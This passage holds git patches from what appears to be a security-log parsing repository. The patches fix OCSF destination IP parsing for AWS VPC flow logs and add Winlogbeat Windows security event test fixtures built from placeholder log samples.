-        "sha1": "ff77777000aaaaaaaaaffb100000c0fb25ccccc6",
-        "sha256": "3aa8333873527333382433308d52333230354923305566335f7e9f0a732ea565"
-      },
-      "name": "platform-python3.6",
+      "name": "grep",
       "parent": {
+        "args": [
+          "--register",
+          "/usr/lib/python3.6/run.py"
+        ],
+        "code_signature": {
+          "status": "Unknown",
+          "subject_name": "Unknown"
+        },
+        "command_line": "/usr/test/platform-python /usr/lib/python3.6/run.py --register",
+        "executable": "/usr/test/platform-python3.6",
+        "hash": {
+          "md5": "eeeee2999444ddaaaaa08598b06eafe7",
+          "sha1": "ff77777000aaaaaaaaaffb100000c0fb25ccccc6",
+          "sha256": "3aa8333873527333382433308d52333230354923305566335f7e9f0a732ea565"
+        },
         "name": "platform-python3.6",
-        "pid": 408229,
-        "start": "2024-09-24T14:17:34.790000Z"
+        "pid": 408996,
+        "start": "2024-09-24T14:18:11.850000Z",
+        "user": {
+          "domain": "testdomain",
+          "name": "testaccount"
+        },
+        "working_directory": "/usr/test"
       },
       "pid": 408996,
       "start": "2024-09-24T14:18:11.864114Z",
-      "user": {
-        "domain": "testdomain",
-        "name": "testaccount"
-      },
-      "working_directory": "/usr/test"
+      "working_directory": "/usr/bin"
     },
     "related": {
       "hash": [

From 99b7d065b680791ad270f5eb80aa0b40480c6650 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Thu, 14 Nov 2024 09:20:57 +0100
Subject: [PATCH 225/317] fix(OCSF): fix destination.ip

---
 OCSF/ocsf/ingest/parser.yml                  |  4 +-
 OCSF/ocsf/tests/test_network_activity_7.json | 42 ++++++++++++++++++++
 2 files changed, 45 insertions(+), 1 deletion(-)
 create mode 100644 OCSF/ocsf/tests/test_network_activity_7.json

diff --git a/OCSF/ocsf/ingest/parser.yml b/OCSF/ocsf/ingest/parser.yml
index 765a6a76d..e43994811 100644
--- a/OCSF/ocsf/ingest/parser.yml
+++ b/OCSF/ocsf/ingest/parser.yml
@@ -567,9 +567,11 @@ stages:
           destination.domain: "{{ parse_event.message.dst_endpoint.hostname }}"
         filter: "{{ parse_event.message.dst_endpoint.get('hostname') != None }}"
       - set:
-          destination.ip: "{{ parse_event.message.dst_endpoint.ip }}"
           destination.mac: "{{ parse_event.message.dst_endpoint.mac }}"
           destination.port: "{{ parse_event.message.dst_endpoint.port }}"
+      - set:
+          destination.ip: "{{ parse_event.message.dst_endpoint.ip }}"
+        filter: "{{ parse_event.message.dst_endpoint.ip | is_ipaddress }}"
       - set:
           network.application: "{{ parse_event.message.dst_endpoint.svc_name }}"
         filter: "{{ parse_event.message.dst_endpoint.get('svc_name') != None }}"
diff --git a/OCSF/ocsf/tests/test_network_activity_7.json b/OCSF/ocsf/tests/test_network_activity_7.json
new file mode 100644
index 000000000..271c6e7a2
--- /dev/null
+++ b/OCSF/ocsf/tests/test_network_activity_7.json
@@ -0,0 +1,42 @@
+{
+  "input": {
+    "sekoiaio": {
+      "intake": {
+        "dialect": "OCSF [BETA]",
+        "dialect_uuid": "a9c959ac-78ec-47a4-924e-8156a77cebf5"
+      }
+    },
+    "message": "{\"metadata\":{\"product\":{\"version\":\"5\",\"name\":\"Amazon VPC\",\"feature\":{\"name\":\"Flowlogs\"},\"vendor_name\":\"AWS\"},\"profiles\":[\"cloud\",\"security_control\",\"datetime\"],\"version\":\"1.1.0\"},\"cloud\":{\"account\":{\"uid\":\"111111111111\"},\"region\":\"eu-west-3\",\"zone\":\"euw3-az1\",\"provider\":\"AWS\"},\"src_endpoint\":{\"port\":null,\"svc_name\":\"-\",\"ip\":\"-\",\"intermediate_ips\":null,\"interface_uid\":\"eni-11111111111111111\",\"vpc_uid\":\"vpc-11111111111111111\",\"instance_uid\":\"-\",\"subnet_uid\":\"subnet-11111111111111111\"},\"dst_endpoint\":{\"port\":null,\"svc_name\":\"-\",\"ip\":\"-\",\"intermediate_ips\":null,\"interface_uid\":null,\"vpc_uid\":null,\"instance_uid\":null,\"subnet_uid\":null},\"connection_info\":{\"protocol_num\":null,\"tcp_flags\":null,\"protocol_ver\":\"-\",\"boundary_id\":99,\"boundary\":null,\"direction_id\":99,\"direction\":\"-\"},\"traffic\":null,\"time\":1731529427000,\"time_dt\":1731529427000,\"start_time_dt\":1731529427000,\"end_time_dt\":1731529458000,\"status_code\":\"NODATA\",\"severity_id\":1,\"severity\":\"Informational\",\"class_name\":\"Network Activity\",\"class_uid\":4001,\"category_name\":\"Network Activity\",\"category_uid\":4,\"activity_name\":\"Unknown\",\"activity_id\":0,\"action\":\"-\",\"action_id\":99,\"disposition\":\"-\",\"type_uid\":400100,\"type_name\":\"Network Activity: Unknown\",\"accountid\":null,\"region\":null,\"asl_version\":null,\"unmapped\":[[\"sublocation_id\",\"-\"],[\"sublocation_type\",\"-\"]],\"observables\":null}\n"
+  },
+  "expected": {
+    "message": "{\"metadata\":{\"product\":{\"version\":\"5\",\"name\":\"Amazon VPC\",\"feature\":{\"name\":\"Flowlogs\"},\"vendor_name\":\"AWS\"},\"profiles\":[\"cloud\",\"security_control\",\"datetime\"],\"version\":\"1.1.0\"},\"cloud\":{\"account\":{\"uid\":\"111111111111\"},\"region\":\"eu-west-3\",\"zone\":\"euw3-az1\",\"provider\":\"AWS\"},\"src_endpoint\":{\"port\":null,\"svc_name\":\"-\",\"ip\":\"-\",\"intermediate_ips\":null,\"interface_uid\":\"eni-11111111111111111\",\"vpc_uid\":\"vpc-11111111111111111\",\"instance_uid\":\"-\",\"subnet_uid\":\"subnet-11111111111111111\"},\"dst_endpoint\":{\"port\":null,\"svc_name\":\"-\",\"ip\":\"-\",\"intermediate_ips\":null,\"interface_uid\":null,\"vpc_uid\":null,\"instance_uid\":null,\"subnet_uid\":null},\"connection_info\":{\"protocol_num\":null,\"tcp_flags\":null,\"protocol_ver\":\"-\",\"boundary_id\":99,\"boundary\":null,\"direction_id\":99,\"direction\":\"-\"},\"traffic\":null,\"time\":1731529427000,\"time_dt\":1731529427000,\"start_time_dt\":1731529427000,\"end_time_dt\":1731529458000,\"status_code\":\"NODATA\",\"severity_id\":1,\"severity\":\"Informational\",\"class_name\":\"Network Activity\",\"class_uid\":4001,\"category_name\":\"Network Activity\",\"category_uid\":4,\"activity_name\":\"Unknown\",\"activity_id\":0,\"action\":\"-\",\"action_id\":99,\"disposition\":\"-\",\"type_uid\":400100,\"type_name\":\"Network Activity: Unknown\",\"accountid\":null,\"region\":null,\"asl_version\":null,\"unmapped\":[[\"sublocation_id\",\"-\"],[\"sublocation_type\",\"-\"]],\"observables\":null}\n",
+    "event": {
+      "action": "unknown",
+      "category": [
+        "network"
+      ],
+      "end": "2024-11-13T20:24:18Z",
+      "kind": "event",
+      "severity": 1,
+      "start": "2024-11-13T20:23:47Z",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-11-13T20:23:47Z",
+    "cloud": {
+      "account": {
+        "id": "111111111111"
+      },
+      "availability_zone": "euw3-az1",
+      "provider": "AWS",
+      "region": "eu-west-3"
+    },
+    "ocsf": {
+      "activity_id": 0,
+      "activity_name": "Unknown",
+      "class_name": "Network Activity",
+      "class_uid": 4001
+    }
+  }
+}
\ No newline at end of file

From b2374d10776dfee644f3660f54064d4ce87002b8 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Thu, 14 Nov 2024 09:23:57 +0100
Subject: [PATCH 226/317] fix(OCSF): apply linter

---
 OCSF/ocsf/tests/test_network_activity_7.json | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/OCSF/ocsf/tests/test_network_activity_7.json b/OCSF/ocsf/tests/test_network_activity_7.json
index 271c6e7a2..c6192eda7 100644
--- a/OCSF/ocsf/tests/test_network_activity_7.json
+++ b/OCSF/ocsf/tests/test_network_activity_7.json
@@ -1,12 +1,12 @@
 {
   "input": {
+    "message": "{\"metadata\":{\"product\":{\"version\":\"5\",\"name\":\"Amazon VPC\",\"feature\":{\"name\":\"Flowlogs\"},\"vendor_name\":\"AWS\"},\"profiles\":[\"cloud\",\"security_control\",\"datetime\"],\"version\":\"1.1.0\"},\"cloud\":{\"account\":{\"uid\":\"111111111111\"},\"region\":\"eu-west-3\",\"zone\":\"euw3-az1\",\"provider\":\"AWS\"},\"src_endpoint\":{\"port\":null,\"svc_name\":\"-\",\"ip\":\"-\",\"intermediate_ips\":null,\"interface_uid\":\"eni-11111111111111111\",\"vpc_uid\":\"vpc-11111111111111111\",\"instance_uid\":\"-\",\"subnet_uid\":\"subnet-11111111111111111\"},\"dst_endpoint\":{\"port\":null,\"svc_name\":\"-\",\"ip\":\"-\",\"intermediate_ips\":null,\"interface_uid\":null,\"vpc_uid\":null,\"instance_uid\":null,\"subnet_uid\":null},\"connection_info\":{\"protocol_num\":null,\"tcp_flags\":null,\"protocol_ver\":\"-\",\"boundary_id\":99,\"boundary\":null,\"direction_id\":99,\"direction\":\"-\"},\"traffic\":null,\"time\":1731529427000,\"time_dt\":1731529427000,\"start_time_dt\":1731529427000,\"end_time_dt\":1731529458000,\"status_code\":\"NODATA\",\"severity_id\":1,\"severity\":\"Informational\",\"class_name\":\"Network Activity\",\"class_uid\":4001,\"category_name\":\"Network Activity\",\"category_uid\":4,\"activity_name\":\"Unknown\",\"activity_id\":0,\"action\":\"-\",\"action_id\":99,\"disposition\":\"-\",\"type_uid\":400100,\"type_name\":\"Network Activity: Unknown\",\"accountid\":null,\"region\":null,\"asl_version\":null,\"unmapped\":[[\"sublocation_id\",\"-\"],[\"sublocation_type\",\"-\"]],\"observables\":null}\n",
     "sekoiaio": {
       "intake": {
         "dialect": "OCSF [BETA]",
         "dialect_uuid": "a9c959ac-78ec-47a4-924e-8156a77cebf5"
       }
-    },
-    "message": "{\"metadata\":{\"product\":{\"version\":\"5\",\"name\":\"Amazon VPC\",\"feature\":{\"name\":\"Flowlogs\"},\"vendor_name\":\"AWS\"},\"profiles\":[\"cloud\",\"security_control\",\"datetime\"],\"version\":\"1.1.0\"},\"cloud\":{\"account\":{\"uid\":\"111111111111\"},\"region\":\"eu-west-3\",\"zone\":\"euw3-az1\",\"provider\":\"AWS\"},\"src_endpoint\":{\"port\":null,\"svc_name\":\"-\",\"ip\":\"-\",\"intermediate_ips\":null,\"interface_uid\":\"eni-11111111111111111\",\"vpc_uid\":\"vpc-11111111111111111\",\"instance_uid\":\"-\",\"subnet_uid\":\"subnet-11111111111111111\"},\"dst_endpoint\":{\"port\":null,\"svc_name\":\"-\",\"ip\":\"-\",\"intermediate_ips\":null,\"interface_uid\":null,\"vpc_uid\":null,\"instance_uid\":null,\"subnet_uid\":null},\"connection_info\":{\"protocol_num\":null,\"tcp_flags\":null,\"protocol_ver\":\"-\",\"boundary_id\":99,\"boundary\":null,\"direction_id\":99,\"direction\":\"-\"},\"traffic\":null,\"time\":1731529427000,\"time_dt\":1731529427000,\"start_time_dt\":1731529427000,\"end_time_dt\":1731529458000,\"status_code\":\"NODATA\",\"severity_id\":1,\"severity\":\"Informational\",\"class_name\":\"Network Activity\",\"class_uid\":4001,\"category_name\":\"Network Activity\",\"category_uid\":4,\"activity_name\":\"Unknown\",\"activity_id\":0,\"action\":\"-\",\"action_id\":99,\"disposition\":\"-\",\"type_uid\":400100,\"type_name\":\"Network Activity: Unknown\",\"accountid\":null,\"region\":null,\"asl_version\":null,\"unmapped\":[[\"sublocation_id\",\"-\"],[\"sublocation_type\",\"-\"]],\"observables\":null}\n"
+    }
   },
   "expected": {
     "message": "{\"metadata\":{\"product\":{\"version\":\"5\",\"name\":\"Amazon VPC\",\"feature\":{\"name\":\"Flowlogs\"},\"vendor_name\":\"AWS\"},\"profiles\":[\"cloud\",\"security_control\",\"datetime\"],\"version\":\"1.1.0\"},\"cloud\":{\"account\":{\"uid\":\"111111111111\"},\"region\":\"eu-west-3\",\"zone\":\"euw3-az1\",\"provider\":\"AWS\"},\"src_endpoint\":{\"port\":null,\"svc_name\":\"-\",\"ip\":\"-\",\"intermediate_ips\":null,\"interface_uid\":\"eni-11111111111111111\",\"vpc_uid\":\"vpc-11111111111111111\",\"instance_uid\":\"-\",\"subnet_uid\":\"subnet-11111111111111111\"},\"dst_endpoint\":{\"port\":null,\"svc_name\":\"-\",\"ip\":\"-\",\"intermediate_ips\":null,\"interface_uid\":null,\"vpc_uid\":null,\"instance_uid\":null,\"subnet_uid\":null},\"connection_info\":{\"protocol_num\":null,\"tcp_flags\":null,\"protocol_ver\":\"-\",\"boundary_id\":99,\"boundary\":null,\"direction_id\":99,\"direction\":\"-\"},\"traffic\":null,\"time\":1731529427000,\"time_dt\":1731529427000,\"start_time_dt\":1731529427000,\"end_time_dt\":1731529458000,\"status_code\":\"NODATA\",\"severity_id\":1,\"severity\":\"Informational\",\"class_name\":\"Network Activity\",\"class_uid\":4001,\"category_name\":\"Network Activity\",\"category_uid\":4,\"activity_name\":\"Unknown\",\"activity_id\":0,\"action\":\"-\",\"action_id\":99,\"disposition\":\"-\",\"type_uid\":400100,\"type_name\":\"Network Activity: Unknown\",\"accountid\":null,\"region\":null,\"asl_version\":null,\"unmapped\":[[\"sublocation_id\",\"-\"],[\"sublocation_type\",\"-\"]],\"observables\":null}\n",

From 943de11e6ab15711fa104a51ee2e5a41b90a3ab5 Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Thu, 14 Nov 2024 11:41:51 +0100
Subject: [PATCH 227/317] Enhancement/Winlogbeat: Addition of new events

---
 .../winlogbeat/tests/security_event_4624.json | 145 +++++++++++++
 .../winlogbeat/tests/security_event_4625.json | 193 ++++++++++++++++++
 .../winlogbeat/tests/security_event_4634.json | 112 ++++++++++
 .../winlogbeat/tests/security_event_4662.json | 105 ++++++++++
 .../winlogbeat/tests/security_event_4672.json |  82 ++++++++
 .../winlogbeat/tests/security_event_4689.json |  88 ++++++++
 .../winlogbeat/tests/security_event_4720.json | 127 ++++++++++++
 .../winlogbeat/tests/security_event_4722.json | 111 ++++++++++
 .../winlogbeat/tests/security_event_4723.json | 112 ++++++++++
 .../winlogbeat/tests/security_event_4725.json | 111 ++++++++++
 .../winlogbeat/tests/security_event_4726.json |  84 ++++++++
 .../winlogbeat/tests/security_event_4768.json | 102 +++++++++
 .../winlogbeat/tests/security_event_4769.json | 101 +++++++++
 .../winlogbeat/tests/security_event_4798.json | 114 +++++++++++
 .../winlogbeat/tests/security_event_5140.json |   5 -
 .../winlogbeat/tests/security_event_5145.json |   7 -
 16 files changed, 1587 insertions(+), 12 deletions(-)
 create mode 100644 Beats/winlogbeat/tests/security_event_4624.json
 create mode 100644 Beats/winlogbeat/tests/security_event_4625.json
 create mode 100644 Beats/winlogbeat/tests/security_event_4634.json
 create mode 100644 Beats/winlogbeat/tests/security_event_4662.json
 create mode 100644 Beats/winlogbeat/tests/security_event_4672.json
 create mode 100644 Beats/winlogbeat/tests/security_event_4689.json
 create mode 100644 Beats/winlogbeat/tests/security_event_4720.json
 create mode 100644 Beats/winlogbeat/tests/security_event_4722.json
 create mode 100644 Beats/winlogbeat/tests/security_event_4723.json
 create mode 100644 Beats/winlogbeat/tests/security_event_4725.json
 create mode 100644 Beats/winlogbeat/tests/security_event_4726.json
 create mode 100644 Beats/winlogbeat/tests/security_event_4768.json
 create mode 100644 Beats/winlogbeat/tests/security_event_4769.json
 create mode 100644 Beats/winlogbeat/tests/security_event_4798.json

diff --git a/Beats/winlogbeat/tests/security_event_4624.json b/Beats/winlogbeat/tests/security_event_4624.json
new file mode 100644
index 000000000..9e8cdfb26
--- /dev/null
+++ b/Beats/winlogbeat/tests/security_event_4624.json
@@ -0,0 +1,145 @@
+{
+  "input": {
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Elastic Winlogbeat",
+        "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b"
+      }
+    },
+    "message": "{\"agent\":{\"version\":\"7.0.0\",\"hostname\":\"hostname\",\"id\":\"abcd1234-abcd-1234-ef56-abcdef123456\",\"ephemeral_id\":\"12345678-1234-5678-9012-123456789012\",\"type\":\"winlogbeat\"},\"host\":{\"hostname\":\"hostname\",\"os\":{\"version\":\"10.0\",\"build\":\"17763.6414\",\"family\":\"windows\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"name\":\"Windows Server 2019 Datacenter\"},\"id\":\"abcdefab-1234-5678-9012-abcdefabcdef\",\"name\":\"hostname\",\"architecture\":\"x86_64\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.0.0\"},\"event\":{\"created\":\"2024-11-12T08:41:07.164Z\",\"action\":\"Logon\",\"code\":4624,\"kind\":\"event\"},\"tags\":[\"beats_input_codec_plain_applied\"],\"winlog\":{\"keywords\":[\"Audit Success\"],\"api\":\"wineventlog\",\"version\":2,\"process\":{\"pid\":752,\"thread\":{\"id\":7960}},\"record_id\":1170100815,\"event_data\":{\"TargetLinkedLogonId\":\"0x0\",\"IpPort\":\"29051\",\"TargetOutboundUserName\":\"-\",\"ImpersonationLevel\":\"%%1833\",\"TargetDomainName\":\"DOMAIN\",\"TargetOutboundDomainName\":\"-\",\"IpAddress\":\"1.2.3.4\",\"LogonProcessName\":\"Process \",\"WorkstationName\":\"WS-USER-01\",\"LmPackageName\":\"-\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessId\":\"0x2f0\",\"VirtualAccount\":\"%%1843\",\"SubjectLogonId\":\"0x3e7\",\"KeyLength\":\"0\",\"RestrictedAdminMode\":\"-\",\"TargetUserSid\":\"S-4-5-6\",\"ElevatedToken\":\"%%1843\",\"SubjectUserName\":\"WS-USER-01$\",\"LogonGuid\":\"{00000000-0000-0000-0000-000000000000}\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"SubjectDomainName\":\"DOMAIN\",\"TargetUserName\":\"target_user\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"TargetLogonId\":\"0xfcebb74a\",\"AuthenticationPackageName\":\"MICROSOFT_AUTHENTICATION_PACKAGE_V1_0\"},\"event_id\":4624,\"computer_name\":\"hostname.company.com\",\"channel\":\"Security\",\"task\":\"Logon\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"opcode\":\"Info\"},\"log\":{\"level\":\"information\"},\"message\":\"An account was successfully logged on.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tWS-USER-01$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nLogon Information:\\n\\tLogon Type:\\t\\t3\\n\\tRestricted Admin Mode:\\t-\\n\\tVirtual Account:\\t\\tNo\\n\\tElevated Token:\\t\\tNo\\n\\nImpersonation Level:\\t\\tImpersonation\\n\\nNew Logon:\\n\\tSecurity ID:\\t\\tS-4-5-6\\n\\tAccount Name:\\t\\ttarget_user\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0xFCEBB74A\\n\\tLinked Logon ID:\\t\\t0x0\\n\\tNetwork Account Name:\\t-\\n\\tNetwork Account Domain:\\t-\\n\\tLogon GUID:\\t\\t{00000000-0000-0000-0000-000000000000}\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x2f0\\n\\tProcess Name:\\t\\tC:\\\\Windows\\\\System32\\\\executable.exe\\n\\nNetwork Information:\\n\\tWorkstation Name:\\tWS-USER-01\\n\\tSource Network Address:\\t1.2.3.4\\n\\tSource Port:\\t\\t29051\\n\\nDetailed Authentication Information:\\n\\tLogon Process:\\t\\tProcess \\n\\tAuthentication Package:\\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\\n\\tTransited Services:\\t-\\n\\tPackage Name (NTLM only):\\t-\\n\\tKey Length:\\t\\t0\\n\\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\\n\\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\\n\\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\\n\\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\\n\\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\\n\\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\\n\\nThe authentication information fields provide detailed information about this specific logon request.\\n\\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\\n\\t- Transited services indicate which intermediate services have participated in this logon request.\\n\\t- Package name indicates which sub-protocol was used among the NTLM protocols.\\n\\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.\",\"@version\":\"1\",\"@timestamp\":\"2024-11-12T08:41:05.803Z\"}"
+  },
+  "expected": {
+    "message": "{\"agent\":{\"version\":\"7.0.0\",\"hostname\":\"hostname\",\"id\":\"abcd1234-abcd-1234-ef56-abcdef123456\",\"ephemeral_id\":\"12345678-1234-5678-9012-123456789012\",\"type\":\"winlogbeat\"},\"host\":{\"hostname\":\"hostname\",\"os\":{\"version\":\"10.0\",\"build\":\"17763.6414\",\"family\":\"windows\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"name\":\"Windows Server 2019 Datacenter\"},\"id\":\"abcdefab-1234-5678-9012-abcdefabcdef\",\"name\":\"hostname\",\"architecture\":\"x86_64\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.0.0\"},\"event\":{\"created\":\"2024-11-12T08:41:07.164Z\",\"action\":\"Logon\",\"code\":4624,\"kind\":\"event\"},\"tags\":[\"beats_input_codec_plain_applied\"],\"winlog\":{\"keywords\":[\"Audit Success\"],\"api\":\"wineventlog\",\"version\":2,\"process\":{\"pid\":752,\"thread\":{\"id\":7960}},\"record_id\":1170100815,\"event_data\":{\"TargetLinkedLogonId\":\"0x0\",\"IpPort\":\"29051\",\"TargetOutboundUserName\":\"-\",\"ImpersonationLevel\":\"%%1833\",\"TargetDomainName\":\"DOMAIN\",\"TargetOutboundDomainName\":\"-\",\"IpAddress\":\"1.2.3.4\",\"LogonProcessName\":\"Process \",\"WorkstationName\":\"WS-USER-01\",\"LmPackageName\":\"-\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessId\":\"0x2f0\",\"VirtualAccount\":\"%%1843\",\"SubjectLogonId\":\"0x3e7\",\"KeyLength\":\"0\",\"RestrictedAdminMode\":\"-\",\"TargetUserSid\":\"S-4-5-6\",\"ElevatedToken\":\"%%1843\",\"SubjectUserName\":\"WS-USER-01$\",\"LogonGuid\":\"{00000000-0000-0000-0000-000000000000}\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"SubjectDomainName\":\"DOMAIN\",\"TargetUserName\":\"target_user\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"TargetLogonId\":\"0xfcebb74a\",\"AuthenticationPackageName\":\"MICROSOFT_AUTHENTICATION_PACKAGE_V1_0\"},\"event_id\":4624,\"computer_name\":\"hostname.company.com\",\"channel\":\"Security\",\"task\":\"Logon\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"opcode\":\"Info\"},\"log\":{\"level\":\"information\"},\"message\":\"An account was successfully logged on.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tWS-USER-01$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nLogon Information:\\n\\tLogon Type:\\t\\t3\\n\\tRestricted Admin Mode:\\t-\\n\\tVirtual Account:\\t\\tNo\\n\\tElevated Token:\\t\\tNo\\n\\nImpersonation Level:\\t\\tImpersonation\\n\\nNew Logon:\\n\\tSecurity ID:\\t\\tS-4-5-6\\n\\tAccount Name:\\t\\ttarget_user\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0xFCEBB74A\\n\\tLinked Logon ID:\\t\\t0x0\\n\\tNetwork Account Name:\\t-\\n\\tNetwork Account Domain:\\t-\\n\\tLogon GUID:\\t\\t{00000000-0000-0000-0000-000000000000}\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x2f0\\n\\tProcess Name:\\t\\tC:\\\\Windows\\\\System32\\\\executable.exe\\n\\nNetwork Information:\\n\\tWorkstation Name:\\tWS-USER-01\\n\\tSource Network Address:\\t1.2.3.4\\n\\tSource Port:\\t\\t29051\\n\\nDetailed Authentication Information:\\n\\tLogon Process:\\t\\tProcess \\n\\tAuthentication Package:\\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\\n\\tTransited Services:\\t-\\n\\tPackage Name (NTLM only):\\t-\\n\\tKey Length:\\t\\t0\\n\\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\\n\\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\\n\\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\\n\\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\\n\\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\\n\\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\\n\\nThe authentication information fields provide detailed information about this specific logon request.\\n\\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\\n\\t- Transited services indicate which intermediate services have participated in this logon request.\\n\\t- Package name indicates which sub-protocol was used among the NTLM protocols.\\n\\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.\",\"@version\":\"1\",\"@timestamp\":\"2024-11-12T08:41:05.803Z\"}",
+    "event": {
+      "action": "authentication_network",
+      "category": [
+        "authentication"
+      ],
+      "code": "4624",
+      "kind": "event",
+      "module": "security",
+      "original": "An account was successfully logged on.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tWS-USER-01$\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x3E7\n\nLogon Information:\n\tLogon Type:\t\t3\n\tRestricted Admin Mode:\t-\n\tVirtual Account:\t\tNo\n\tElevated Token:\t\tNo\n\nImpersonation Level:\t\tImpersonation\n\nNew Logon:\n\tSecurity ID:\t\tS-4-5-6\n\tAccount Name:\t\ttarget_user\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0xFCEBB74A\n\tLinked Logon ID:\t\t0x0\n\tNetwork Account Name:\t-\n\tNetwork Account Domain:\t-\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\n\nProcess Information:\n\tProcess ID:\t\t0x2f0\n\tProcess Name:\t\tC:\\Windows\\System32\\executable.exe\n\nNetwork Information:\n\tWorkstation Name:\tWS-USER-01\n\tSource Network Address:\t1.2.3.4\n\tSource Port:\t\t29051\n\nDetailed Authentication Information:\n\tLogon Process:\t\tProcess \n\tAuthentication Package:\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\n\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\n\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\n\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\n\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.",
+      "type": [
+        "start"
+      ]
+    },
+    "@timestamp": "2024-11-12T08:41:05.803000Z",
+    "action": {
+      "id": 4624,
+      "outcome": "success",
+      "properties": {
+        "AuthenticationPackageName": "MICROSOFT_AUTHENTICATION_PACKAGE_V1_0",
+        "ElevatedToken": "%%1843",
+        "ImpersonationLevel": "%%1833",
+        "IpAddress": "1.2.3.4",
+        "IpPort": "29051",
+        "KeyLength": "0",
+        "LmPackageName": "-",
+        "LogonGuid": "{00000000-0000-0000-0000-000000000000}",
+        "LogonProcessName": "Process ",
+        "LogonType": "3",
+        "ProcessId": "0x2f0",
+        "ProcessName": "C:\\Windows\\System32\\executable.exe",
+        "RestrictedAdminMode": "-",
+        "SubjectDomainName": "DOMAIN",
+        "SubjectLogonId": "0x3e7",
+        "SubjectUserName": "WS-USER-01$",
+        "SubjectUserSid": "S-1-2-3",
+        "TargetDomainName": "DOMAIN",
+        "TargetLinkedLogonId": "0x0",
+        "TargetLogonId": "0xfcebb74a",
+        "TargetOutboundDomainName": "-",
+        "TargetOutboundUserName": "-",
+        "TargetUserName": "target_user",
+        "TargetUserSid": "S-4-5-6",
+        "TransmittedServices": "-",
+        "VirtualAccount": "%%1843",
+        "WorkstationName": "WS-USER-01"
+      }
+    },
+    "agent": {
+      "ephemeral_id": "12345678-1234-5678-9012-123456789012",
+      "id": "abcd1234-abcd-1234-ef56-abcdef123456",
+      "type": "winlogbeat",
+      "version": "7.0.0"
+    },
+    "client": {
+      "ip": "1.2.3.4"
+    },
+    "host": {
+      "architecture": "x86_64",
+      "hostname": "hostname",
+      "id": "abcdefab-1234-5678-9012-abcdefabcdef",
+      "name": "hostname",
+      "os": {
+        "build": "17763.6414",
+        "family": "windows",
